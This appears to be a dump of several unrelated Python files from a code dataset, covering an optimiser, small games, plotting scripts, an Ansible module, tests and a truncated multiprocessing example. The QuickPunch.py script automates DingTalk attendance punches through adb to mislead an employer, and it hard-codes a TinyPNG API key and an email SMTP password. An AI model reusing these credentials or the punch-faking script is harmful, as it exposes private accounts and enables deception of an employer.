algorithm\r\n '''\r\n len = self.vardim\r\n rnd = np.random.random(size=len)\r\n self.chrom = np.zeros(len)\r\n for i in range(0, len):\r\n self.chrom[i] = self.bound[0, i] + \\\r\n (self.bound[1, i] - self.bound[0, i]) * rnd[i]\r\n\r\n def calculateFitness(self):\r\n '''\r\n calculate the fitness of the chromsome\r\n '''\r\n self.fitness = -self.fct(self.chrom)\r\n\r\n\r\nclass DifferentialEvolutionAlgorithm:\r\n\r\n '''\r\n The class for differential evolution algorithm\r\n '''\r\n\r\n def __init__(self, fct, sizepop, vardim, bound, MAXGEN, params):\r\n '''\r\n sizepop: population sizepop\r\n vardim: dimension of variables\r\n bound: boundaries of variables\r\n MAXGEN: termination condition\r\n param: algorithm required parameters, it is a list which is consisting of [crossover rate CR, scaling factor F]\r\n '''\r\n self.sizepop = sizepop\r\n self.MAXGEN = MAXGEN\r\n self.vardim = vardim\r\n self.bound = bound\r\n self.population = []\r\n self.fitness = np.zeros((self.sizepop, 1))\r\n self.trace = np.zeros((self.MAXGEN, 2))\r\n self.params = params\r\n self.fct = fct\r\n\r\n def initialize(self):\r\n '''\r\n initialize the population\r\n '''\r\n for i in range(0, self.sizepop):\r\n ind = DEIndividual(self.fct, self.vardim, self.bound)\r\n ind.generate()\r\n self.population.append(ind)\r\n\r\n def evaluate(self, x):\r\n '''\r\n evaluation of the population fitnesses\r\n '''\r\n x.calculateFitness()\r\n\r\n def solve(self):\r\n '''\r\n evolution process of differential evolution algorithm\r\n '''\r\n SM = []\r\n self.t = 0\r\n self.initialize()\r\n for i in range(0, self.sizepop):\r\n self.evaluate(self.population[i])\r\n self.fitness[i] = self.population[i].fitness\r\n best = np.max(self.fitness)\r\n bestIndex = np.argmax(self.fitness)\r\n self.best = copy.deepcopy(self.population[bestIndex])\r\n self.avefitness = np.mean(self.fitness)\r\n self.trace[self.t, 0] = (1 - self.best.fitness) / self.best.fitness\r\n self.trace[self.t, 1] = (1 - self.avefitness) / self.avefitness\r\n # print(\"Generation %d: optimal function value is: %f; average function value is %f\" % (\r\n # self.t, self.trace[self.t, 0], self.trace[self.t, 1]))\r\n while (self.t <= self.MAXGEN):\r\n for i in range(0, self.sizepop):\r\n vi = self.mutationOperation(i)\r\n ui = self.crossoverOperation(i, vi)\r\n xi_next = self.selectionOperation(i, ui)\r\n self.population[i] = xi_next\r\n for i in range(0, self.sizepop):\r\n self.evaluate(self.population[i])\r\n self.fitness[i] = self.population[i].fitness\r\n best = np.max(self.fitness)\r\n bestIndex = np.argmax(self.fitness)\r\n if best > self.best.fitness:\r\n self.best = self.population[bestIndex]\r\n if self.t % 20 == 0:\r\n print(self.t, ':', -best)\r\n SM.append(-best)\r\n self.t += 1\r\n '''\r\n # if abs(best)<1e-15:\r\n # break\r\n self.avefitness = np.mean(self.fitness)\r\n self.trace[self.t, 0] = (1 - self.best.fitness) / self.best.fitness\r\n self.trace[self.t, 1] = (1 - self.avefitness) / self.avefitness\r\n\r\n #print(\"Generation %d: optimal function value is: %f; average function value is %f\" % (\r\n # self.t, self.trace[self.t, 0], self.trace[self.t, 1]))\r\n '''\r\n print(\"Optimal function value is: %f; \" %\r\n self.best.fitness)\r\n print(\"Optimal solution is:\")\r\n print(self.best.chrom)\r\n return SM\r\n # self.printResult()\r\n\r\n def selectionOperation(self, i, ui):\r\n '''\r\n selection operation for differential evolution algorithm\r\n '''\r\n xi_next = copy.deepcopy(self.population[i])\r\n xi_next.chrom = ui\r\n self.evaluate(xi_next)\r\n if xi_next.fitness > self.population[i].fitness:\r\n return xi_next\r\n else:\r\n return self.population[i]\r\n\r\n def crossoverOperation(self, i, vi):\r\n '''\r\n crossover operation for differential evolution algorithm\r\n '''\r\n k = np.random.random_integers(0, self.vardim - 1)\r\n ui = np.zeros(self.vardim)\r\n for j in range(0, self.vardim):\r\n pick = random.random()\r\n if pick < self.params[0] or j == k:\r\n ui[j] = vi[j]\r\n else:\r\n ui[j] = self.population[i].chrom[j]\r\n return ui\r\n\r\n def mutationOperation(self, i):\r\n '''\r\n mutation operation for differential evolution algorithm\r\n '''\r\n a = np.random.random_integers(0, self.sizepop - 1)\r\n while a == i:\r\n a = np.random.random_integers(0, self.sizepop - 1)\r\n b = np.random.random_integers(0, self.sizepop - 1)\r\n while b == i or b == a:\r\n b = np.random.random_integers(0, self.sizepop - 1)\r\n c = np.random.random_integers(0, self.sizepop - 1)\r\n while c == i or c == b or c == a:\r\n c = np.random.random_integers(0, self.sizepop - 1)\r\n vi = self.population[c].chrom + self.params[1] * \\\r\n (self.population[a].chrom - self.population[b].chrom)\r\n for j in range(0, self.vardim):\r\n if vi[j] < self.bound[0, j]:\r\n vi[j] = self.bound[0, j]\r\n if vi[j] > self.bound[1, j]:\r\n vi[j] = self.bound[1, j]\r\n return vi\r\n\r\n def printResult(self):\r\n '''\r\n plot the result of the differential evolution algorithm\r\n '''\r\n x = np.arange(0, self.MAXGEN)\r\n y1 = self.trace[:, 0]\r\n y2 = self.trace[:, 1]\r\n plt.plot(x, y1, 'r', label='optimal value')\r\n plt.plot(x, y2, 'g', label='average value')\r\n plt.xlabel(\"Iteration\")\r\n plt.ylabel(\"function value\")\r\n plt.title(\"Differential Evolution Algorithm for function optimization\")\r\n plt.legend()\r\n plt.show()\r\n\r\nif __name__ == \"__main__\":\r\n # bound = np.tile([[-10], [10]], 30)abs\r\n s = time.clock()\r\n bound = np.tile([[-600], [600]], 30)\r\n # dea = DifferentialEvolutionAlgorithm(\r\n # fcts.Rlevy, 120, 30, bound, 1000, [5, 0.6])\r\n dea = DifferentialEvolutionAlgorithm(\r\n fcts.sphere, 100, 30, bound, 600, [0.9, 0.6])\r\n dea.solve()\r\n print(time.clock() - s)\r\n","sub_path":"在聚类中的应用/dea.py","file_name":"dea.py","file_ext":"py","file_size_in_byte":7466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"508087509","text":"import random\nfrom colors import *\n\nsmall_numbers = [1, 2, 3]\n\ntry:\n \n print(red(\"Enter the number of tries:\"))\n\n number_of_retries = input()\n number_of_retries_list = []\n for i in range(1, int(number_of_retries)):\n number_of_retries_list.insert(0, '0')\n\n print(red(\"Enter the range of Guessing:\"))\n\n insert = input() # the insert of the player\n insert = insert.split(\" \")\n\n first = int(insert[0]) # the first number of the guessing range\n second = int(insert[1]) # the second number of the guessing range\n\n guessing_numbers = range(first, second) # the guessing range\n number = random.choice(guessing_numbers) # the random number that the player should guess\n # the player's guess of the number\n for i in number_of_retries_list:\n small_guess = random.choice(small_numbers)\n small_guess_2 = random.choice(small_numbers)\n try_1 = input()\n if int(try_1) == number: # Tells the player that he/she guessed right\n print(red(\"Congratulations You got it right\"))\n break\n elif first > second: # Tells the player that second must be greater than first\n print(red(\"Second number should be greater than first number\"))\n continue\n elif second - first == 0: # Tells the player that second must be greater than first\n print(red(\"Second number should be greater than first number\"))\n continue\n elif second < 0 or first < 0: # Tells the player that there should be no negative number\n print(red(\"There should be no negative numbers\"))\n continue\n elif 1 == second - first: # Tells the player the random number\n print(red(\"Number is \" + str(number)))\n print(red(\"Stupid\"))\n break\n elif 1 < second - first < 6 and ((second - 1) - (first + 1)) != 0 and number in range((first+1), (second-1)):\n # Acts on numbers of difference between 1 and 6\n print(red(\"Number is between \" + str(first + 1) + \" \" + str(second - 1))) # Gives the player a hint\n first = first + 1\n second = second - 1\n continue\n elif second - first == 6 and number in range((first+2), (second-2)):\n # Acts if the difference between the numbers is 6\n print(red(\"Number is between \" + str(first + 2) + \" \" + str(second - 2)))\n first = first + 2\n second = second - 2\n continue\n elif 7 == second - first and number in range((first+1), (second-1)):\n # Acts if the difference between the numbers is 7\n print(red(\"Number is between \" + str(first + 1) + \" \" + str(second - 2)))\n first = first + 1\n second = second - 2\n continue\n elif 7 < second - first < 10 and number in range((first+small_guess), (second-small_guess_2)):\n # Acts if the difference between the two numbers is between 7 and 10\n print(red(\"Number is between \" + str(first + small_guess) + \" \" + str(second - small_guess_2)))\n first = first + small_guess\n second = second - small_guess_2\n continue\n elif 10 == second - first and number in range((first + 3), (second - 3)):\n # Acts if the difference between the two numbers is 10\n print(red(\"Number is between \" + str(first + 3) + \" \" + str(second - 3)))\n first = first + 3\n second = second - 3\n continue\n else: # Acts if the loop ends\n print(red(\"\\nThe number is \" + str(number)))\n\n\nexcept ValueError:\n print(red(\"Insert digits ONLY\"))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"48670089","text":"# Software Carpentry\r\n# Lazor Project\r\n# Group 5\r\n\r\n'''\r\nThis file is responsible for printing the solution board\r\nThe result is a .txt file containing the answer\r\n'''\r\n\r\nfrom copy import deepcopy\r\nimport datetime\r\n\r\n\r\ndef text_soln(filename, initGrid, soln, tries, possible, runtime):\r\n '''\r\n Write the solution board to a file with some other information\r\n\r\n **Parameters**\r\n\r\n filename: string\r\n The name of the board we are solving\r\n initGrid: list\r\n A list of lists; the given empty problem board\r\n soln: dictionary\r\n A dictionary containing the positions of the pieces\r\n for the solution board. Keys are the coordinates,\r\n values are the block type at the coordinates\r\n tries: int\r\n The number of tries it took to find the answer\r\n possible: int\r\n The number of possible boards that could have been\r\n made from the inputs\r\n runtime: float\r\n The amount of time it took to get the answer\r\n\r\n **Returns**\r\n\r\n NOTHING\r\n '''\r\n\r\n fname = filename.split('.')[0]\r\n\r\n solnGrid = deepcopy(initGrid)\r\n for i in soln.keys():\r\n solnGrid[i[1]][i[0]] = soln[i]\r\n\r\n f = open(fname + '_solution.txt', 'w')\r\n\r\n f.write('Software Carpentry Lazor Project - Group 5\\n')\r\n f.write(str(datetime.datetime.now()))\r\n f.write('\\nPuzzle: ' + fname + '\\n \\n')\r\n\r\n f.write('Given board: \\n')\r\n for i in initGrid:\r\n line = ' '.join(i)\r\n line = line + '\\n'\r\n f.write(line)\r\n\r\n f.write('\\nSolution board: \\n')\r\n for i in solnGrid:\r\n line = ' '.join(i)\r\n line = line + '\\n'\r\n f.write(line)\r\n\r\n f.write('\\n%d guesses were made out of a possible %d boards.\\n' % (tries, possible))\r\n f.write('Finding this solution took %f seconds.\\n' % (runtime))\r\n f.write('Thanks for playing!\\n')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n pass\r\n","sub_path":"print_solution.py","file_name":"print_solution.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"261071158","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom pygorithm import sorting\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 13 00:53:50 2019\n@author: christophercoram\n\"\"\"\n# Use sorting to organize the amount of players on the team in order by they're jersey number.\n##########################\nplayerNumbers = [32, 57, 23, 16, 56, 4, 1, 24]\n# Class holds functions related to sorting\nclass sort():\n # Sorting function aranges playerNumbers variable from least to greatest\n def sortingPlayers(self):\n for i in range(len(playerNumbers)):\n sorting.bubble_sort.sort(playerNumbers)\n \n # objectx variable contains class sort() to call function\nobjectx = sort()\n\n# Instructions on how to access sorting function in class\nprint(\"To organize player numbers, input Arange: \")\nx = input()\ndef execute():\n # If statement allows user input to call class\n if x == \"Arange\":\n objectx.sortingPlayers()\n print(\"*************\")\n# execute function allows user input on console\nexecute()\n\n\n\n# Create two charts displaying fanbase opinions over players:\n##########################\n# Bar chart predicting player scores for tonights game\n##########################\nN = 8\nplayerPointNumbers = (30, 22, 3, 19, 26, 8, 13, 14)\nwidth = 0.35\nind = np.arange(N)\n# Class holds functions related to pygorithm\nclass graphOne():\n # playerPoints function will gather data from variable and diplay a 2D chart in console\n def playerPoints(self): \n p1 = plt.bar(ind, playerPointNumbers, width,) \n \n plt.title('Predicted Scores For Tonights Game, 2019')\n plt.xticks(ind, ('Rondo','Kobe','Shaq','Curry','Durrant','Jordan','CP3','Westbrook'))\n plt.yticks(np.arange(0, 50, 20))\n plt.xlabel(\"Players\")\n plt.ylabel(\"Predicted Scores\")\n plt.legend((p1[0], ('Players')))\n plt.show\n # objecty variable contains class graphOne() to call function\nobjecty = graphOne()\n# Instructions on how to access plt conditions in class\nprint(\"To bring up both charts, follow instructions.\")\nprint(\"input Graph One: \")\nx = input()\ndef executeTwo():\n # If statement allows user input to call class\n if x == \"Graph One\":\n objecty.playerPoints()\n print(\"*************\")\n# execute function allows user input on console\nexecuteTwo()\n\n\n\n# Bar Chart of fan opions on most favorite / valuable players\n##########################\n# Fixing random state\nnp.random.seed(19680801)\nplt.rcdefaults()\nfig, ax = plt.subplots()\n# Bar chart data\nplayers = ('Rondo','Kobe','Shaq','Curry','Durrant','Jordan','CP3')\ny_pos = np.arange(len(players))\nplayerNames = 3 + 10 * np.random.rand(len(players))\nerror = np.random.rand(len(players))\nclass graphTwo():\n def favoritePlayers(self):\n ax.barh(y_pos, playerNames, xerr=error, align='center', \n color='green', ecolor='green')\n ax.set_yticks(y_pos)\n ax.set_yticklabels(players)\n ax.invert_yaxis() \n ax.set_xlabel('Favoriblity Rating Out Of Twelve')\n plt.ylabel(\"Player Names\")\n ax.set_title('Most Valuable / Favorite Player, 2019')\n plt.show()\n# objectz variable contains class graphTwo() to call function\nobjectz = graphTwo()\n# Instructions on how to access plt conditions in class\nprint(\"input Graph Three: \")\nx = input()\ndef executeThree():\n # If statement allows user input to call class\n if x == \"Graph Three\":\n objectz.favoritePlayers()\n print(\"*************\")\n# execute function allows user input on console \nexecuteThree()\n","sub_path":"MachineLearning/Sports Data.py","file_name":"Sports Data.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"69774396","text":"from contextlib import asynccontextmanager\n\nimport trio\n\nfrom .utils import aclosed\n\n\nclass Dispatcher:\n\n def __init__(self):\n self._lock = trio.Lock()\n self._send_channels = set()\n\n async def pub(self, event):\n async with self._lock:\n for send_channel in self._send_channels:\n await send_channel.send(event)\n\n @aclosed\n async def sub(self, predicate, task_status=trio.TASK_STATUS_IGNORED):\n async with self._open_channel() as recv_channel:\n task_status.started()\n\n async for event in recv_channel:\n if predicate(event):\n yield event\n\n async def wait(self, predicate, **kwargs):\n async with self.sub(predicate, **kwargs) as events:\n async for event in events:\n return event\n\n @property\n def has_subs(self):\n return len(self._send_channels) != 0\n\n @asynccontextmanager\n async def _open_channel(self):\n send_channel, recv_channel = trio.open_memory_channel(0)\n\n async with send_channel, recv_channel:\n async with self._lock:\n self._send_channels.add(send_channel)\n\n try:\n yield recv_channel\n\n finally:\n with trio.CancelScope(shield=True):\n async with self._lock:\n self._send_channels.remove(send_channel)\n","sub_path":"src/async_vk_bot/dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"226285927","text":"##############################################################################\n# Import some libraries\n##############################################################################\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.interpolate import interp1d\n\n##############################################################################\n# Some defs\n##############################################################################\n# Custom palette for plotting ################################################\ndef palette():\n colours = {'mnk_purple': [145 / 255, 125 / 255, 240 / 255],\n 'mnk_dgrey': [39 / 255, 40 / 255, 34 / 255],\n 'mnk_lgrey': [96 / 255, 96 / 255, 84 / 255],\n 'mnk_green': [95 / 255, 164 / 255, 44 / 255],\n 'mnk_yellow': [229 / 255, 220 / 255, 90 / 255],\n 'mnk_blue': [75 / 255, 179 / 255, 232 / 255],\n 'mnk_orange': [224 / 255, 134 / 255, 31 / 255],\n 'mnk_pink': [180 / 255, 38 / 255, 86 / 255],\n ####\n 'ggred': [217 / 255, 83 / 255, 25 / 255],\n 'ggblue': [30 / 255, 144 / 255, 229 / 255],\n 'ggpurple': [145 / 255, 125 / 255, 240 / 255],\n 'ggyellow': [229 / 255, 220 / 255, 90 / 255],\n 'gglred': [237 / 255, 103 / 255, 55 / 255],\n 'gglblue': [20 / 255, 134 / 255, 209 / 255],\n 'gglpurple': [165 / 255, 145 / 255, 255 / 255],\n 'gglyellow': [249 / 255, 240 / 255, 110 / 255],\n 'ggdred': [197 / 255, 63 / 255, 5 / 255],\n 'ggdblue': [0 / 255, 94 / 255, 169 / 255],\n 'ggdpurple': [125 / 255, 105 / 255, 220 / 255],\n 'ggdyellow': [209 / 255, 200 / 255, 70 / 255],\n }\n return colours\n\n\n# set rcParams for nice plots ################################################\ndef ggplot_sansserif():\n colours = palette()\n # plt.style.use('ggplot')\n plt.rcParams['font.size'] = 8\n plt.rcParams['font.family'] = 'sans-serif'\n plt.rcParams['font.sans-serif'] = 'DejaVu Sans'\n plt.rcParams['axes.labelsize'] = 8\n plt.rcParams['axes.labelweight'] = 'normal'\n plt.rcParams['xtick.labelsize'] = 8\n plt.rcParams['ytick.labelsize'] = 8\n plt.rcParams['legend.fontsize'] = 10\n plt.rcParams['figure.titlesize'] = 8\n plt.rcParams['lines.color'] = 'white'\n plt.rcParams['text.color'] = colours['mnk_purple']\n plt.rcParams['axes.labelcolor'] = colours['mnk_yellow']\n plt.rcParams['xtick.color'] = colours['mnk_purple']\n plt.rcParams['ytick.color'] = colours['mnk_purple']\n plt.rcParams['axes.edgecolor'] = colours['mnk_lgrey']\n plt.rcParams['savefig.edgecolor'] = colours['mnk_lgrey']\n plt.rcParams['axes.facecolor'] = colours['mnk_dgrey']\n plt.rcParams['savefig.facecolor'] = colours['mnk_dgrey']\n plt.rcParams['grid.color'] = colours['mnk_lgrey']\n plt.rcParams['grid.linestyle'] = ':'\n plt.rcParams['axes.titlepad'] = 6\n\n\n# Set up figure for plotting #################################################\ndef set_figure(name='figure', xaxis='x axis', yaxis='y axis', size=3):\n ggplot_sansserif()\n cs = palette()\n fig1 = plt.figure(name, figsize=(size * np.sqrt(2), size))\n ax1 = fig1.add_subplot(111)\n fig1.patch.set_facecolor(cs['mnk_dgrey'])\n ax1.set_xlabel(xaxis)\n ax1.set_ylabel(yaxis)\n return ax1, fig1, cs\n\n\n# Save 2d plot with a colourscheme suitable for ppt, as a png ################\ndef PPT_save_2d(fig, ax, name, dpi=600):\n\n # Set plot colours\n plt.rcParams['text.color'] = 'xkcd:black'\n plt.rcParams['savefig.facecolor'] = ((1.0, 1.0, 1.0, 0.0))\n ax.patch.set_facecolor((1.0, 1.0, 1.0, 0.0))\n ax.xaxis.label.set_color('xkcd:black')\n ax.yaxis.label.set_color('xkcd:black')\n ax.tick_params(axis='x', colors='xkcd:black')\n ax.tick_params(axis='y', colors='xkcd:black')\n\n # Loop to check for file - appends filename with _# if name already exists\n f_exist = True\n app_no = 0\n while f_exist is True:\n if os.path.exists(name + '.png') is False:\n ax.figure.savefig(name, dpi=dpi)\n f_exist = False\n print('Base exists')\n elif os.path.exists(name + '_' + str(app_no) + '.png') is False:\n ax.figure.savefig(name + '_' + str(app_no), dpi=dpi)\n f_exist = False\n print(' # = ' + str(app_no))\n else:\n app_no = app_no + 1\n print('Base + # exists')\n\nos.chdir(r\"C:\\local files\\Compiled Data\\Confocal characterisation\")\n\nf_405 = (r\"C:\\local files\\Compiled Data\\Confocal characterisation\\405nm peak.csv\")\nf_458 = (r\"C:\\local files\\Compiled Data\\Confocal characterisation\\458nm peak.csv\")\nf_488 = (r\"C:\\local files\\Compiled Data\\Confocal characterisation\\488nm peak.csv\")\nf_515 = (r\"C:\\local files\\Compiled Data\\Confocal characterisation\\515nm peak.csv\")\nf_543 = (r\"C:\\local files\\Compiled Data\\Confocal characterisation\\543nm peak.csv\")\nf_630 = (r\"C:\\local files\\Compiled Data\\Confocal characterisation\\630nm peak.csv\")\n\nf_Wg = (r\"C:\\local files\\Compiled Data\\Confocal characterisation\\Hg WG.csv\")\n\nfs = [f_405, f_458, f_488, f_515, f_543, f_630]\nlbs = ['405 nm', '458 nm', '488 nm', '515 nm', '543 nm', '630 nm']\ncs = ['xkcd:indigo', 'xkcd:blue', 'xkcd:teal',\n 'xkcd:aquamarine', 'xkcd:green', 'xkcd:red']\nax0, fig0, cs0 = set_figure('spectra', 'wavelength / nm', 'arb.int', 5)\n# for i0,v0 in enumerate(fs):\ni0 = 4\n\t# v0 = fs[i0]\n\ndata = np.genfromtxt(f_Wg, skip_header=36, skip_footer=1, delimiter='\\t')\nx = data[:, 0]\ny = data[:, 1]\n\nx_new = np.linspace(x.min(), x.max(), 130000)\ny_interp = interp1d(x, y, kind='quadratic')\ny_smooth = y_interp(x_new)\nx_max = x_new[np.argmax(y_smooth)]\n# text = ' ' + str(np.round(x_max, 2))\n\nplt.plot(data[:, 0], data[:, 1] / np.max(data[:, 1]),\n '-',\n color=cs[i0],\n label='Epi - WG')\n\t# plt.text(x_max, 1, text)\n\t# plt.plot(x_new, y_smooth / np.max(y_smooth),\n\t# color='xkcd:charcoal')\nax0.set_xlim((500, 580))\n\nax0.legend(loc='upper right', fancybox=True, framealpha=0.5)\nplt.tight_layout()\nplt.show()\n\nax0.legend(loc='upper right', fancybox=True, facecolor=(1.0, 1.0, 1.0, 0.0))\n\nPPT_save_2d(fig0, ax0, '458 nm')\n","sub_path":"Misc file reading/Thorlabs CSS csv read and plot commercial SCM.py","file_name":"Thorlabs CSS csv read and plot commercial SCM.py","file_ext":"py","file_size_in_byte":6233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"54613059","text":"#!/usr/bin/python\n# Copyright: Ansible Project\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\nfrom __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\n\nANSIBLE_METADATA = {'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'certified'}\n\n\nDOCUMENTATION = '''\n---\nmodule: elasticsearch_domain_facts\nshort_description: Get information about elasticsearch_domain\ndescription:\n - Module search for Elasticsearch Domain (clusters)\nversion_added: \"2.7\"\nrequirements: [ boto3 ]\noptions:\n domain_name:\n description:\n - DomainName of the ES cluster.\nextends_documentation_fragment:\n - aws\n'''\n\nEXAMPLES = '''\n- elasticsearch_domain_facts:\n domain_name: example-domain\n'''\n\nRETURN = '''\nelasticsearch_domain\n\nhttps://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/es.html#ElasticsearchService.Client.describe_elasticsearch_domain\n'''\n\n\ntry:\n import botocore\nexcept ImportError:\n pass # caught by AnsibleAWSModule\n\nfrom ansible.module_utils.aws.core import AnsibleAWSModule\nfrom ansible.module_utils._text import to_native\nfrom ansible.module_utils.ec2 import boto3_conn, get_aws_connection_info, ec2_argument_spec, camel_dict_to_snake_dict\n\n\ndef get_elasticsearch_domain(module, client):\n \"\"\"[summary]\n\n [description]\n\n Arguments:\n module {[type]} -- [description]\n client {[type]} -- [description]\n \"\"\"\n try:\n domain_name = module.params.get('domain_name')\n return camel_dict_to_snake_dict(client.describe_elasticsearch_domain(DomainName=domain_name))\n except botocore.exceptions.ClientError as e:\n module.fail_json_aws(e, msg='Unexpected error {0}'.format(to_native(e)))\n\n\ndef main():\n \"\"\"\n Module action handler\n \"\"\"\n argument_spec = ec2_argument_spec()\n argument_spec.update(dict(\n id=dict(),\n domain_name=dict(),\n ))\n\n module = AnsibleAWSModule(argument_spec=argument_spec,\n supports_check_mode=True)\n\n region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)\n client = boto3_conn(\n module,\n conn_type='client',\n resource='es',\n region=region,\n endpoint=ec2_url,\n **aws_connect_kwargs)\n\n # only support pre-constructed domain_name or now\n es_domain = get_elasticsearch_domain(module, client)\n\n module.exit_json(changed=False, ansible_facts={'elasticsearch_domain': es_domain})\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"library/elasticsearch_domain_facts.py","file_name":"elasticsearch_domain_facts.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"67427211","text":"# -*- coding: utf-8 -*-\nimport json\nimport tinify\nimport schedule, requests\nimport os, time, smtplib\nfrom subprocess import run\nfrom datetime import datetime\nfrom email import encoders\nfrom email.mime.base import MIMEBase\nfrom email.mime.multipart import MIMEMultipart # 发送多个部分\nfrom email.mime.text import MIMEText # 专门发送正文\n\n# 配置图片压缩\ntinify.key = 'mhDgfkycPsLfqZyrB5D8TrqlXR8fKPt2'\n\ndef job():\n if (datetime.now().strftime(\"%H:%M\") == \"09:12\"):\n holiday(time.strftime(\"%Y-%m-%d\", time.localtime()), \"上班\")\n else:\n holiday(time.strftime(\"%Y-%m-%d\", time.localtime()), \"下班\")\n\n\ndef holiday(time, text):\n url = \"http://tool.bitefu.net/jiari/?d=\" + time\n response = json.loads(requests.get(url).text)\n if (response == 0):\n daka(text)\n else:\n print(\"不用打卡\")\n\n\ndef daka(text):\n run(\"adb kill-server\")\n run(\"adb start-server\")\n with os.popen(r'adb shell dumpsys power', 'r') as f:\n content = f.read()\n if 'Display Power: state=OFF' in content:\n print('屏幕已灭屏。')\n run(\"adb shell input keyevent 26\")\n run(\"adb shell am force-stop com.alibaba.android.rimet\")\n run(\"adb shell am start -n com.alibaba.android.rimet/com.alibaba.android.rimet.biz.LaunchHomeActivity\")\n # time.sleep(10)\n run(\"adb shell screencap -p /sdcard/Download/autojump.png\")\n run(\"adb pull /sdcard/Download/autojump.png .\")\n run(\"adb shell rm /sdcard/Download/autojump.png\")\n tinify.from_file(\"autojump.png\").to_file(\"autojump.png\")\n send_email(text)\n\n\ndef send_email(text):\n msg = MIMEMultipart()\n msg['Subject'] = '钉钉自动打卡' # 主题\n msg['From'] = 'autopunch@foxmail.com' # 发件人\n msg['To'] = '898763215@qq.com' # 收件人\n # 正文\n part_text = MIMEText('Hello 易大宝' + time.strftime(\"%Y-%m-%d\", time.localtime()) + text + \"打卡成功\")\n msg.attach(part_text) # 把正文加到邮件体里面去\n with open('autojump.png', 'rb') as f:\n # 设置附件的MIME和文件名,这里是png类型:\n mime = MIMEBase('image', 'png', filename='tp.png')\n # 加上必要的头信息:\n mime.add_header('Content-Disposition', 'attachment', filename='autojump.png')\n mime.add_header('Content-ID', '<0>')\n mime.add_header('X-Attachment-Id', '0')\n # 把附件的内容读进来:\n mime.set_payload(f.read())\n # 用Base64编码:\n encoders.encode_base64(mime)\n # 添加到MIMEMultipart:\n msg.attach(mime)\n # 发送邮件 SMTP\n smtp = smtplib.SMTP('smtp.qq.com', 25) # 连接服务器,SMTP_SSL是安全传输\n smtp.login('autopunch@foxmail.com', 'jhsejyfnsblzcbec')\n smtp.sendmail('autopunch@foxmail.com', '898763215@qq.com', msg.as_string()) # 发送邮件\n print('邮件发送成功!')\n #电脑删除图片\n if os.path.exists('autojump.png'):\n os.remove('autojump.png')\n else:\n print('图片删除失败!')\n\nif __name__ == '__main__':\n daka(\"\")\n # schedule.every().day.at(\"09:12\").do(job)\n # schedule.every().day.at(\"09:32\").do(job)\n # while True:\n # # 启动服务,run_pending()运行所有可以运行的任务\n # schedule.run_pending()\n # time.sleep(1)","sub_path":"QuickPunch.py","file_name":"QuickPunch.py","file_ext":"py","file_size_in_byte":3278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"591964656","text":"import datetime as dt\nimport unittest\n#from .notification import Job, Config, UpworkClient\n\n\nconfig = Config(\"test_configuration.ini\").config\napi_key = config['upwork']['api_key']\napi_secret = config['upwork']['api_key']\njob_skill = config['upwork']['job_skill']\njob_query = dict(\n skills=[job_skill],\n budget='[100 TO 100000]',\n duration=['week', 'month', 'ongoing']\n)\n\n\nclass TestJob(unittest.TestCase):\n\n def setUp(self):\n self.job = Job(\n \"Expert\", dt.date(2001, 1, 1), \"developers\", \"…\",\n \"Lead Android Developer\",\n \"https://www.upwork.com/job/test\",\n )\n\n def test_init(self):\n self.assertEqual(self.job.budget, \"Expert\")\n self.assertEqual(self.job.date, dt.date(2001, 1, 1))\n\n def test_job_info(self):\n self.assertEqual(str(self.job),\n \"New job: Lead Android Developer \\nType: developers\\n\" +\\\n \"Budget : Expert $ \\nCreated on: 2001-01-01 \" +\\\n \"Informations: … \\nLink: https://www.upwork.com/job/test\"\n )\n\nclass TestConfig(unittest.TestCase):\n\n def setUp(self):\n self.config = config\n\n def test_init(self):\n # self.assertRaises(Exception)\n self.assertEqual(self.config['upwork']['api_key'], api_key)\n self.assertEqual(self.config['upwork']['api_secret'], api_secret)\n\n\nclass TestUpworkClient(unittest.TestCase):\n\n def setUp(self):\n self.upworkclient = UpworkClient(api_key, api_secret)\n\n @unittest.skip(\"Cannot setup because upwork.Client doesn’t exist\")\n def test_search_jobs(self):\n self.assertEqual(self.upworkclient.search_jobs(job_query), \"/Need to fill in here: Does Upwork has a live test job?/\")\n","sub_path":"upwork/test_notification.py","file_name":"test_notification.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"387102919","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# Created by airvip on 2018/2/2 17:06.\n\nfrom multiprocessing import Pool\nimport random\nimport time\nimport os\n\ndef p_run(name):\n print(\"%s 号子进程开始工作, ID 为:%s\" % (name, os.getpid()))\n start = time.time()\n time.sleep(random.random()) # 随机休息一点时间\n end = time.time()\n print(\"%s 号子进程用时 %.3f 秒\" % (name, (end - start)))\n\nif __name__ == '__main__': # 在交互式模式下自动执行\n start = time.time()\n print(\"父进程 ID 为 %d\" % os.getpid())\n p = Pool(3)\n for i in range(4):\n # apply方法(阻塞),传入子进程要执行的函数和函数参数(以元组的形式)\n 